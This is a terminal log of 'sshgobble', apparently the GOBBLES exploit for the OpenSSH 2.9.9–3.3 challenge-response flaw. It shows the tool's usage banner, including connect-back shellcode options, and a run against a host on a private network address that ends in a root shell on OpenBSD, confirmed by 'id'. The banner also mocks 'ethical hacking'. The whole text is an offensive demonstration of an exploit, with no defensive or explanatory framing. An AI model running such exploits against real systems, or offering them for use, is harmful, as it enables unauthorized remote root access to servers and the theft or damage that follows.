$ ./sshgobble
GOBBLES SECURITY - WHITEHATS POSTING TO BUGTRAQ FOR FAME
OpenSSH 2.9.9 - 3.3 remote challenge-response exploit
#1 rule of ``ethical hacking'': drop dead

Usage: sshgobble [options] host
Options:
***** READ THE HOWTO FILE IN THE TARBALL *****
  -l user     Log in using this user name.
  -p port     Connect to this port.  Server must be on the same port.
  -M method   Select the device (skey or bsdauth)
              default: bsdauth
  -S style    If using bsdauth, select the style
              default: skey
  -d rep      Test shellcode repeat
              default: 10000 (with -z) ; 0 (without -z)
  -j size     Chunk size
              default: 4096 (1 page)
  -r rep      Connect-back shellcode repeat
              default: 60 (not used with -z)
  -z          Enable testing mode
  -v          Verbose; display verbose debugging messages.
              Multiple -v increases verbosity.
$ ./sshgobble -l root 192.168.3.100
[*] remote host supports ssh2
Warning: Permanently added '192.168.3.100' (RSA) to the list of known hosts.
[*] server_user: root:skey
[*] keyboard-interactive method available
[*] chunk_size: 4096 tcode_rep: 0 scode_rep 60
[*] mode: exploitation
*GOBBLE*
OpenBSD pufferfish 3.0 GENERIC#94 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)
exit

read(): Connection reset by peer
$